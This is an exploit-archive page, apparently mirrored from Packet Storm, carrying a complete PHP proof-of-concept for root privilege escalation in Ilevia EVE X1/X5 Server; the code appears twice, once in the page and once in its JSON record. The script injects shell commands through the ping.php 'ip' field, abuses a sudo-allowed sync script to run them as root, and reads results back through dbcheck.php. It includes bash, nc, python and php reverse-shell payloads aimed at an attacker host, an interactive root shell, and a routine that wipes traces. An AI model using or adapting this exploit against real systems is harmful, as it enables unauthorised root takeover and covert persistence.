📄 Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions 4.7.18.0.eden and below. This is a proof of concept exploit written in PHP...

Visit Original Source

Basic Information

ID PACKETSTORM:212930

Published Dec 17, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.ilevia.com |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211593/ & CVE-2025-34514

[+] Summary : A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions ≤ 4.7.18.0.eden
due to improper sudoers configuration and command injection in the web interface. The vulnerability allows the www-data web user
to execute arbitrary commands as root without authentication, leading to complete system compromise.

[+] POC : * Usage: php ilevia_exploit.php <target_url> <command>

<?php
/**
* Ilevia EVE X1/X5 Server Privilege Escalation Exploit
* CVE-2025-34515 - by indoushka
*/

class IleviaExploit {
private $target_url;
private $session;

public function __construct($target_url) {
$this->target_url = rtrim($target_url, '/');
$this->session = curl_init();
curl_setopt_array($this->session, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30,
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
]);
}

private function request($path, $data = [], $method = 'POST') {
$url = $this->target_url . $path;
curl_setopt($this->session, CURLOPT_URL, $url);

if ($method === 'POST') {
curl_setopt($this->session, CURLOPT_POST, true);
curl_setopt($this->session, CURLOPT_POSTFIELDS, http_build_query($data));
} else {
curl_setopt($this->session, CURLOPT_POST, false);
if (!empty($data)) {
$url .= '?' . http_build_query($data);
curl_setopt($this->session, CURLOPT_URL, $url);
}
}

$response = curl_exec($this->session);
return $response;
}

/**
* استخدام ثغرة حقن الأوامر في ping.php لكتابة أمر في السكريبت
*/
public function injectCommand($command) {
echo "[*] حقن الأمر في السكريبت...\n";

// تحويل الأمر إلى صيغة آمنة للنص
$encoded_cmd = base64_encode($command);
$payload = "echo '#!/bin/bash' > /tmp/exploit.sh && ";
$payload .= "echo 'echo \"" . addslashes($encoded_cmd) . "\" | base64 -d | bash' >> /tmp/exploit.sh && ";
$payload .= "chmod +x /tmp/exploit.sh && ";
$payload .= "echo 'id' >> /home/ilevia/www-config/http/emlite/sync_project.sh && ";
$payload .= "echo 'bash /tmp/exploit.sh' >> /home/ilevia/www-config/http/emlite/sync_project.sh";

$response = $this->request('/ajax/php/ping.php', [
'ip' => "$(bash -c \"" . addslashes($payload) . "\")"
]);

if ($response !== false && trim($response) === '0') {
echo "[+] تم حقن الأمر بنجاح\n";
return true;
}

echo "[-] فشل في حقن الأمر\n";
return false;
}

/**
* تنفيذ السكريبت المعدل باستخدام sudo
*/
public function executePrivileged() {
echo "[*] تنفيذ السكريبت بصلاحيات الجذر...\n";

$response = $this->request('/ajax/php/ping.php', [
'ip' => "$(sudo /home/ilevia/www-config/http/emlite/sync_project.sh > /tmp/result.txt 2>&1 && cat /tmp/result.txt)"
]);

if ($response !== false) {
echo "[+] تم التنفيذ بنجاح\n";

// محاولة قراءة النتيجة
$result = $this->request('/ajax/php/dbcheck.php', [
'db_log' => '/tmp/result.txt'
]);

if ($result) {
$data = json_decode($result, true);
if (isset($data['error'])) {
return $data['error'];
}
}

return $response;
}

return false;
}

/**
* تنفيذ أمر مباشر باستخدام السكريبت
*/
public function executeCommand($command) {
echo "[*] إعداد وتنفيذ الأمر: $command\n";

// إنشاء سكريبت استغلال مؤقت
$temp_script = "/tmp/cmd_" . md5(uniqid()) . ".sh";
$payload = "#!/bin/bash\n";
$payload .= "echo 'echo \\\"Executing as: \\$(id)\\\"' > $temp_script\n";
$payload .= "echo '$command' >> $temp_script\n";
$payload .= "chmod +x $temp_script\n";
$payload .= "sudo bash $temp_script > /tmp/output.txt 2>&1\n";
$payload .= "cat /tmp/output.txt";

$response = $this->request('/ajax/php/ping.php', [
'ip' => "$(bash -c \"" . addslashes($payload) . "\")"
]);

// قراءة المخرجات
$output = $this->request('/ajax/php/dbcheck.php', [
'db_log' => '/tmp/output.txt'
]);

if ($output) {
$data = json_decode($output, true);
if (isset($data['error']) && !empty(trim($data['error']))) {
return $data['error'];
}
}

return $output ?: $response;
}

/**
* استغلال مباشر للحصول على shell عكسي
*/
public function reverseShell($lhost, $lport) {
echo "[*] محاولة الحصول على shell عكسي على $lhost:$lport\n";

$payloads = [
// bash reverse shell
"bash -i >& /dev/tcp/$lhost/$lport 0>&1",
// nc reverse shell
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $lhost $lport >/tmp/f",
// python reverse shell
"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"$lhost\",$lport));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
// php reverse shell
"php -r '\$sock=fsockopen(\"$lhost\",$lport);exec(\"/bin/bash <&3 >&3 2>&3\");'",
];

foreach ($payloads as $i => $payload) {
echo "[*] محاولة payload #" . ($i+1) . "\n";
$result = $this->executeCommand($payload);

if ($result !== false) {
echo "[+] تم إرسال payload بنجاح\n";
echo "[i] استمع على: nc -lvnp $lport\n";
return true;
}

sleep(2);
}

echo "[-] فشل جميع محاولات reverse shell\n";
return false;
}

/**
* اختبار الاتصال بالهدف
*/
public function testConnection() {
echo "[*] اختبار الاتصال بالهدف...\n";

try {
$response = $this->request('/ajax/php/ping.php', [
'ip' => '127.0.0.1'
]);

if ($response !== false && trim($response) === '0') {
echo "[+] الهدف متاح ويستجيب\n";
return true;
}
} catch (Exception $e) {
echo "[-] خطأ في الاتصال: " . $e->getMessage() . "\n";
}

return false;
}

/**
* تنظيف الآثار
*/
public function cleanup() {
echo "[*] تنظيف الآثار...\n";

$cleanup_cmd = "rm -f /tmp/exploit.sh /tmp/result.txt /tmp/output.txt /tmp/cmd_*.sh; ";
$cleanup_cmd .= "sed -i '/^id$/d' /home/ilevia/www-config/http/emlite/sync_project.sh; ";
$cleanup_cmd .= "sed -i '/^bash \\/tmp\\/exploit\\.sh$/d' /home/ilevia/www-config/http/emlite/sync_project.sh";

$this->request('/ajax/php/ping.php', [
'ip' => "$(bash -c \"" . addslashes($cleanup_cmd) . "\")"
]);

echo "[+] تم التنظيف\n";
}

public function __destruct() {
curl_close($this->session);
}
}

// واجهة سطر الأوامر
function printBanner() {
echo "=============================================\n";
echo " Ilevia EVE X1/X5 Privilege Escalation Exploit\n";
echo " CVE-2025-34515 - by indoushka \n";
echo "=============================================\n\n";
}

function printUsage() {
echo "الاستخدام:\n";
echo " php " . basename(__FILE__) . " <url> [options]\n\n";
echo "الخيارات:\n";
echo " --test اختبار الاتصال فقط\n";
echo " --cmd <command> تنفيذ أمر واحد\n";
echo " --shell <ip:port> الحصول على reverse shell\n";
echo " --interactive وضع تفاعلي\n\n";
echo "أمثلة:\n";
echo " php ilevia_exploit.php http://192.168.1.100:8080 --test\n";
echo " php ilevia_exploit.php http://target.com --cmd \"cat /etc/passwd\"\n";
echo " php ilevia_exploit.php http://target.com --shell 192.168.1.50:4444\n";
}

// التنفيذ الرئيسي
if (php_sapi_name() !== 'cli') {
die("هذا الاستغلال يعمل فقط من سطر الأوامر (CLI)\n");
}

if ($argc < 2) {
printBanner();
printUsage();
exit(1);
}

$target = $argv[1];
$exploit = new IleviaExploit($target);

printBanner();

// اختبار الاتصال أولاً
if (!$exploit->testConnection()) {
echo "[-] الهدف غير متاح\n";
exit(1);
}

// معالجة الخيارات
if ($argc >= 3) {
switch ($argv[2]) {
case '--test':
echo "[+] اختبار الاتصال ناجح\n";
exit(0);

case '--cmd':
if ($argc >= 4) {
$command = $argv[3];
echo "[*] تنفيذ الأمر: $command\n";
$result = $exploit->executeCommand($command);
if ($result !== false) {
echo "\n[+] النتيجة:\n";
echo "================================\n";
echo $result . "\n";
echo "================================\n";
} else {
echo "[-] فشل التنفيذ\n";
}
}
break;

case '--shell':
if ($argc >= 4) {
list($lhost, $lport) = explode(':', $argv[3]);
$exploit->reverseShell($lhost, $lport);
}
break;

case '--interactive':
echo "[*] الانتقال للوضع التفاعلي\n";
echo "[i] اكتب 'exit' للخروج أو 'clean' للتنظيف\n\n";

while (true) {
echo "ilevia> ";
$command = trim(fgets(STDIN));

if ($command === 'exit') {
break;
} elseif ($command === 'clean') {
$exploit->cleanup();
continue;
} elseif (empty($command)) {
continue;
}

$result = $exploit->executeCommand($command);
if ($result !== false) {
echo "\n" . $result . "\n\n";
} else {
echo "[-] فشل التنفيذ\n";
}
}
break;

default:
printUsage();
exit(1);
}
} else {
// الوضع الافتراضي: عرض خيارات sudo المتاحة
echo "[*] جلب صلاحيات sudo للمستخدم www-data...\n";
$result = $exploit->executeCommand("sudo -l");
if ($result !== false) {
echo "\n[+] صلاحيات sudo:\n";
echo "================================\n";
echo $result . "\n";
echo "================================\n";
}

echo "\n[i] للمزيد من الخيارات، استخدم --help\n";
}

// تنظيف خفيف في النهاية
$exploit->cleanup();
echo "\n[+] انتهى التنفيذ\n";
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-17T16:37:55",
    "description": "A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions 4.7.18.0.eden and below. This is a proof of concept exploit written in PHP...",
    "published": "2025-12-17T00:00:00",
    "modified": "2025-12-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212930",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-34514",
        "CVE-2025-34515"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation Vulnerability                                               |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://www.ilevia.com                                                                                                      |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/211593/ & CVE-2025-34514\n    \n    [+] Summary : A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions \u2264 4.7.18.0.eden \n                  due to improper sudoers configuration and command injection in the web interface. The vulnerability allows the www-data web user \n    \t\t\t  to execute arbitrary commands as root without authentication, leading to complete system compromise.\n    \n    [+]  POC :  * Usage: php ilevia_exploit.php <target_url> <command>\n    \n    <?php\n    /**\n     * Ilevia EVE X1/X5 Server Privilege Escalation Exploit\n     * CVE-2025-34515 - by indoushka\n     */\n    \n    class IleviaExploit {\n        private $target_url;\n        private $session;\n        \n        public function __construct($target_url) {\n            $this->target_url = rtrim($target_url, '/');\n            $this->session = curl_init();\n            curl_setopt_array($this->session, [\n                CURLOPT_RETURNTRANSFER => true,\n                CURLOPT_FOLLOWLOCATION => true,\n                CURLOPT_TIMEOUT => 30,\n                CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',\n            ]);\n        }\n        \n        private function request($path, $data = [], $method = 'POST') {\n            $url = $this->target_url . $path;\n            curl_setopt($this->session, CURLOPT_URL, $url);\n            \n            if ($method === 'POST') {\n                curl_setopt($this->session, CURLOPT_POST, true);\n                curl_setopt($this->session, CURLOPT_POSTFIELDS, http_build_query($data));\n            } else {\n                curl_setopt($this->session, CURLOPT_POST, false);\n                if (!empty($data)) {\n                    $url .= '?' . http_build_query($data);\n                    curl_setopt($this->session, CURLOPT_URL, $url);\n                }\n            }\n            \n            $response = curl_exec($this->session);\n            return $response;\n        }\n        \n        /**\n         * \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062b\u063a\u0631\u0629 \u062d\u0642\u0646 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0641\u064a ping.php \u0644\u0643\u062a\u0627\u0628\u0629 \u0623\u0645\u0631 \u0641\u064a \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a\n         */\n        public function injectCommand($command) {\n            echo \"[*] \u062d\u0642\u0646 \u0627\u0644\u0623\u0645\u0631 \u0641\u064a \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a...\\n\";\n            \n            // \u062a\u062d\u0648\u064a\u0644 \u0627\u0644\u0623\u0645\u0631 \u0625\u0644\u0649 \u0635\u064a\u063a\u0629 \u0622\u0645\u0646\u0629 \u0644\u0644\u0646\u0635\n            $encoded_cmd = base64_encode($command);\n            $payload = \"echo '#!/bin/bash' > /tmp/exploit.sh && \";\n            $payload .= \"echo 'echo \\\"\" . addslashes($encoded_cmd) . \"\\\" | base64 -d | bash' >> /tmp/exploit.sh && \";\n            $payload .= \"chmod +x /tmp/exploit.sh && \";\n            $payload .= \"echo 'id' >> /home/ilevia/www-config/http/emlite/sync_project.sh && \";\n            $payload .= \"echo 'bash /tmp/exploit.sh' >> /home/ilevia/www-config/http/emlite/sync_project.sh\";\n            \n            $response = $this->request('/ajax/php/ping.php', [\n                'ip' => \"$(bash -c \\\"\" . addslashes($payload) . \"\\\")\"\n            ]);\n            \n            if ($response !== false && trim($response) === '0') {\n                echo \"[+] \u062a\u0645 \u062d\u0642\u0646 \u0627\u0644\u0623\u0645\u0631 \u0628\u0646\u062c\u0627\u062d\\n\";\n                return true;\n            }\n            \n            echo \"[-] \u0641\u0634\u0644 \u0641\u064a \u062d\u0642\u0646 \u0627\u0644\u0623\u0645\u0631\\n\";\n            return false;\n        }\n        \n        /**\n         * \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a \u0627\u0644\u0645\u0639\u062f\u0644 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 sudo\n         */\n        public function executePrivileged() {\n            echo \"[*] \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a \u0628\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u062c\u0630\u0631...\\n\";\n            \n            $response = $this->request('/ajax/php/ping.php', [\n                'ip' => \"$(sudo /home/ilevia/www-config/http/emlite/sync_project.sh > /tmp/result.txt 2>&1 && cat /tmp/result.txt)\"\n            ]);\n            \n            if ($response !== false) {\n                echo \"[+] \u062a\u0645 \u0627\u0644\u062a\u0646\u0641\u064a\u0630 \u0628\u0646\u062c\u0627\u062d\\n\";\n                \n                // \u0645\u062d\u0627\u0648\u0644\u0629 \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0646\u062a\u064a\u062c\u0629\n                $result = $this->request('/ajax/php/dbcheck.php', [\n                    'db_log' => '/tmp/result.txt'\n                ]);\n                \n                if ($result) {\n                    $data = json_decode($result, true);\n                    if (isset($data['error'])) {\n                        return $data['error'];\n                    }\n                }\n                \n                return $response;\n            }\n            \n            return false;\n        }\n        \n        /**\n         * \u062a\u0646\u0641\u064a\u0630 \u0623\u0645\u0631 \u0645\u0628\u0627\u0634\u0631 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a\n         */\n        public function executeCommand($command) {\n            echo \"[*] \u0625\u0639\u062f\u0627\u062f \u0648\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0645\u0631: $command\\n\";\n            \n            // \u0625\u0646\u0634\u0627\u0621 \u0633\u0643\u0631\u064a\u0628\u062a \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0645\u0624\u0642\u062a\n            $temp_script = \"/tmp/cmd_\" . md5(uniqid()) . \".sh\";\n            $payload = \"#!/bin/bash\\n\";\n            $payload .= \"echo 'echo \\\\\\\"Executing as: \\\\$(id)\\\\\\\"' > $temp_script\\n\";\n            $payload .= \"echo '$command' >> $temp_script\\n\";\n            $payload .= \"chmod +x $temp_script\\n\";\n            $payload .= \"sudo bash $temp_script > /tmp/output.txt 2>&1\\n\";\n            $payload .= \"cat /tmp/output.txt\";\n            \n            $response = $this->request('/ajax/php/ping.php', [\n                'ip' => \"$(bash -c \\\"\" . addslashes($payload) . \"\\\")\"\n            ]);\n            \n            // \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u062e\u0631\u062c\u0627\u062a\n            $output = $this->request('/ajax/php/dbcheck.php', [\n                'db_log' => '/tmp/output.txt'\n            ]);\n            \n            if ($output) {\n                $data = json_decode($output, true);\n                if (isset($data['error']) && !empty(trim($data['error']))) {\n                    return $data['error'];\n                }\n            }\n            \n            return $output ?: $response;\n        }\n        \n        /**\n         * \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0645\u0628\u0627\u0634\u0631 \u0644\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 shell \u0639\u0643\u0633\u064a\n         */\n        public function reverseShell($lhost, $lport) {\n            echo \"[*] \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 shell \u0639\u0643\u0633\u064a \u0639\u0644\u0649 $lhost:$lport\\n\";\n            \n            $payloads = [\n                // bash reverse shell\n                \"bash -i >& /dev/tcp/$lhost/$lport 0>&1\",\n                // nc reverse shell\n                \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $lhost $lport >/tmp/f\",\n                // python reverse shell\n                \"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\\\"$lhost\\\",$lport));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\\"/bin/bash\\\")'\",\n                // php reverse shell\n                \"php -r '\\$sock=fsockopen(\\\"$lhost\\\",$lport);exec(\\\"/bin/bash <&3 >&3 2>&3\\\");'\",\n            ];\n            \n            foreach ($payloads as $i => $payload) {\n                echo \"[*] \u0645\u062d\u0627\u0648\u0644\u0629 payload #\" . ($i+1) . \"\\n\";\n                $result = $this->executeCommand($payload);\n                \n                if ($result !== false) {\n                    echo \"[+] \u062a\u0645 \u0625\u0631\u0633\u0627\u0644 payload \u0628\u0646\u062c\u0627\u062d\\n\";\n                    echo \"[i] \u0627\u0633\u062a\u0645\u0639 \u0639\u0644\u0649: nc -lvnp $lport\\n\";\n                    return true;\n                }\n                \n                sleep(2);\n            }\n            \n            echo \"[-] \u0641\u0634\u0644 \u062c\u0645\u064a\u0639 \u0645\u062d\u0627\u0648\u0644\u0627\u062a reverse shell\\n\";\n            return false;\n        }\n        \n        /**\n         * \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0627\u0644\u0647\u062f\u0641\n         */\n        public function testConnection() {\n            echo \"[*] \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0627\u0644\u0647\u062f\u0641...\\n\";\n            \n            try {\n                $response = $this->request('/ajax/php/ping.php', [\n                    'ip' => '127.0.0.1'\n                ]);\n                \n                if ($response !== false && trim($response) === '0') {\n                    echo \"[+] \u0627\u0644\u0647\u062f\u0641 \u0645\u062a\u0627\u062d \u0648\u064a\u0633\u062a\u062c\u064a\u0628\\n\";\n                    return true;\n                }\n            } catch (Exception $e) {\n                echo \"[-] \u062e\u0637\u0623 \u0641\u064a \u0627\u0644\u0627\u062a\u0635\u0627\u0644: \" . $e->getMessage() . \"\\n\";\n            }\n            \n            return false;\n        }\n        \n        /**\n         * \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0622\u062b\u0627\u0631\n         */\n        public function cleanup() {\n            echo \"[*] \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0622\u062b\u0627\u0631...\\n\";\n            \n            $cleanup_cmd = \"rm -f /tmp/exploit.sh /tmp/result.txt /tmp/output.txt /tmp/cmd_*.sh; \";\n            $cleanup_cmd .= \"sed -i '/^id$/d' /home/ilevia/www-config/http/emlite/sync_project.sh; \";\n            $cleanup_cmd .= \"sed -i '/^bash \\\\/tmp\\\\/exploit\\\\.sh$/d' /home/ilevia/www-config/http/emlite/sync_project.sh\";\n            \n            $this->request('/ajax/php/ping.php', [\n                'ip' => \"$(bash -c \\\"\" . addslashes($cleanup_cmd) . \"\\\")\"\n            ]);\n            \n            echo \"[+] \u062a\u0645 \u0627\u0644\u062a\u0646\u0638\u064a\u0641\\n\";\n        }\n        \n        public function __destruct() {\n            curl_close($this->session);\n        }\n    }\n    \n    // \u0648\u0627\u062c\u0647\u0629 \u0633\u0637\u0631 \u0627\u0644\u0623\u0648\u0627\u0645\u0631\n    function printBanner() {\n        echo \"=============================================\\n\";\n        echo \"  Ilevia EVE X1/X5 Privilege Escalation Exploit\\n\";\n        echo \"         CVE-2025-34515 - by indoushka          \\n\";\n        echo \"=============================================\\n\\n\";\n    }\n    \n    function printUsage() {\n        echo \"\u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645:\\n\";\n        echo \"  php \" . basename(__FILE__) . \" <url> [options]\\n\\n\";\n        echo \"\u0627\u0644\u062e\u064a\u0627\u0631\u0627\u062a:\\n\";\n        echo \"  --test          \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0641\u0642\u0637\\n\";\n        echo \"  --cmd <command> \u062a\u0646\u0641\u064a\u0630 \u0623\u0645\u0631 \u0648\u0627\u062d\u062f\\n\";\n        echo \"  --shell <ip:port> \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 reverse shell\\n\";\n        echo \"  --interactive   \u0648\u0636\u0639 \u062a\u0641\u0627\u0639\u0644\u064a\\n\\n\";\n        echo \"\u0623\u0645\u062b\u0644\u0629:\\n\";\n        echo \"  php ilevia_exploit.php http://192.168.1.100:8080 --test\\n\";\n        echo \"  php ilevia_exploit.php http://target.com --cmd \\\"cat /etc/passwd\\\"\\n\";\n        echo \"  php ilevia_exploit.php http://target.com --shell 192.168.1.50:4444\\n\";\n    }\n    \n    // \u0627\u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\n    if (php_sapi_name() !== 'cli') {\n        die(\"\u0647\u0630\u0627 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u064a\u0639\u0645\u0644 \u0641\u0642\u0637 \u0645\u0646 \u0633\u0637\u0631 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 (CLI)\\n\");\n    }\n    \n    if ($argc < 2) {\n        printBanner();\n        printUsage();\n        exit(1);\n    }\n    \n    $target = $argv[1];\n    $exploit = new IleviaExploit($target);\n    \n    printBanner();\n    \n    // \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0623\u0648\u0644\u0627\u064b\n    if (!$exploit->testConnection()) {\n        echo \"[-] \u0627\u0644\u0647\u062f\u0641 \u063a\u064a\u0631 \u0645\u062a\u0627\u062d\\n\";\n        exit(1);\n    }\n    \n    // \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062e\u064a\u0627\u0631\u0627\u062a\n    if ($argc >= 3) {\n        switch ($argv[2]) {\n            case '--test':\n                echo \"[+] \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0646\u0627\u062c\u062d\\n\";\n                exit(0);\n                \n            case '--cmd':\n                if ($argc >= 4) {\n                    $command = $argv[3];\n                    echo \"[*] \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0645\u0631: $command\\n\";\n                    $result = $exploit->executeCommand($command);\n                    if ($result !== false) {\n                        echo \"\\n[+] \u0627\u0644\u0646\u062a\u064a\u062c\u0629:\\n\";\n                        echo \"================================\\n\";\n                        echo $result . \"\\n\";\n                        echo \"================================\\n\";\n                    } else {\n                        echo \"[-] \u0641\u0634\u0644 \u0627\u0644\u062a\u0646\u0641\u064a\u0630\\n\";\n                    }\n                }\n                break;\n                \n            case '--shell':\n                if ($argc >= 4) {\n                    list($lhost, $lport) = explode(':', $argv[3]);\n                    $exploit->reverseShell($lhost, $lport);\n                }\n                break;\n                \n            case '--interactive':\n                echo \"[*] \u0627\u0644\u0627\u0646\u062a\u0642\u0627\u0644 \u0644\u0644\u0648\u0636\u0639 \u0627\u0644\u062a\u0641\u0627\u0639\u0644\u064a\\n\";\n                echo \"[i] \u0627\u0643\u062a\u0628 'exit' \u0644\u0644\u062e\u0631\u0648\u062c \u0623\u0648 'clean' \u0644\u0644\u062a\u0646\u0638\u064a\u0641\\n\\n\";\n                \n                while (true) {\n                    echo \"ilevia> \";\n                    $command = trim(fgets(STDIN));\n                    \n                    if ($command === 'exit') {\n                        break;\n                    } elseif ($command === 'clean') {\n                        $exploit->cleanup();\n                        continue;\n                    } elseif (empty($command)) {\n                        continue;\n                    }\n                    \n                    $result = $exploit->executeCommand($command);\n                    if ($result !== false) {\n                        echo \"\\n\" . $result . \"\\n\\n\";\n                    } else {\n                        echo \"[-] \u0641\u0634\u0644 \u0627\u0644\u062a\u0646\u0641\u064a\u0630\\n\";\n                    }\n                }\n                break;\n                \n            default:\n                printUsage();\n                exit(1);\n        }\n    } else {\n        // \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a: \u0639\u0631\u0636 \u062e\u064a\u0627\u0631\u0627\u062a sudo \u0627\u0644\u0645\u062a\u0627\u062d\u0629\n        echo \"[*] \u062c\u0644\u0628 \u0635\u0644\u0627\u062d\u064a\u0627\u062a sudo \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645 www-data...\\n\";\n        $result = $exploit->executeCommand(\"sudo -l\");\n        if ($result !== false) {\n            echo \"\\n[+] \u0635\u0644\u0627\u062d\u064a\u0627\u062a sudo:\\n\";\n            echo \"================================\\n\";\n            echo $result . \"\\n\";\n            echo \"================================\\n\";\n        }\n        \n        echo \"\\n[i] \u0644\u0644\u0645\u0632\u064a\u062f \u0645\u0646 \u0627\u0644\u062e\u064a\u0627\u0631\u0627\u062a\u060c \u0627\u0633\u062a\u062e\u062f\u0645 --help\\n\";\n    }\n    \n    // \u062a\u0646\u0638\u064a\u0641 \u062e\u0641\u064a\u0641 \u0641\u064a \u0627\u0644\u0646\u0647\u0627\u064a\u0629\n    $exploit->cleanup();\n    echo \"\\n[+] \u0627\u0646\u062a\u0647\u0649 \u0627\u0644\u062a\u0646\u0641\u064a\u0630\\n\";\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212930",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212930/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation_PACKETSTORM:212930

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply